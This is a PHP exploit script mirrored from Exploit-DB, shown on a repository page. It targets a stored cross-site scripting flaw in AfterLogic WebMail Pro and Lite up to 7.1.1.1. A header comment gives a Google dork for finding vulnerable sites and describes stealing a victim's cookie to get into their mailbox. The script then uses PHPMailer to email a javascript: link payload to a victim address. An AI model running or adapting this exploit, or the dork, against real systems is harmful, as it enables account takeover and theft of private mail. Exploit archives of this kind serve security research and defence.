bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/31086.php
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

86 lines
No EOL
2.8 KiB
PHP
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<?php
/*
# Exploit Title : AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS
# Google Dork : intext:"AfterLogic" intext:"Login Information" inurl:index.php
# Date : 19 Jan 2014
# Exploit Author : Saeed reza Zamanian [s.zamanian [AT] imenantivirus.com]
# Vendor Homepage: http://www.afterlogic.com/
# Software Link : http://www.afterlogic.com/download/webmail-pro
# Version : <= 7.1.1.1
# Tested on : KALI Linux 1.0.5 (Debian) Apache/2.2.22
# CVE : vendor id = 6423
Greetz: H.Zamanian, K.Kia, K.Khani
WebApp Desciption:
AfterLogic WebMail is a browser-based e-mail and collaboration front end,
designed to work with your existing messaging solutions. From an administrators
perspective, the application is easy to install on your own server, easy to integrate and
easy to maintain.
Vulnerability Description:
XSS codes can be stored in E-Mail Body.
So you can send an email to the Victim with below payload and steal the victim's cookie.
<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n
NOTE: javascript html char encode = javaScRipt
then you will be able to get into the victim's mailbox via the url:
http://[WebSite]/[AfterLogic]/Default.aspx
## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory:
http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list
*/
echo "<title>AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit</title>";
require_once('class.phpmailer.php');
$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
$mail->IsSMTP(); // telling the class to use SMTP
/* SETTINGS */
$smtp_user = "username"; // Any valid smtp account
$smtp_pass = "password"; // Your PASSWORD
$smtp_port = "25"; // SMTP PORT Default: 25
$smtp_host = "localhost"; // Any valid smtp server
$from = "attacker@email.com"; // Any email
$victim = "victim@email.com"; // Victim email on afterlogic webmail.
$subject = "Salam"; // Subject
/* Body Text */
$body = '<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n';
try {
$mail->SMTPDebug = 2; // enables SMTP debug information (for testing)
$mail->SMTPAuth = false; // enable SMTP authentication
$mail->Host = $smtp_host;
$mail->Port = $smtp_port;
$mail->Username = $smtp_user; // SMTP account username
$mail->Password = $smtp_pass; // SMTP account password
$mail->SetFrom($from, 'Attacker');
$mail->AddReplyTo($from, 'Attacker');
$mail->AddAddress($victim, 'Victim');
$mail->Subject = $subject;
$mail->MsgHTML($body);
$mail->Send();
echo "Message Sent OK</p>\n";
} catch (phpmailerException $e) {
echo $e->errorMessage();
} catch (Exception $e) {
echo $e->getMessage();
}
?>
</body>
</html>
Reference in a new issue View git blame Copy permalink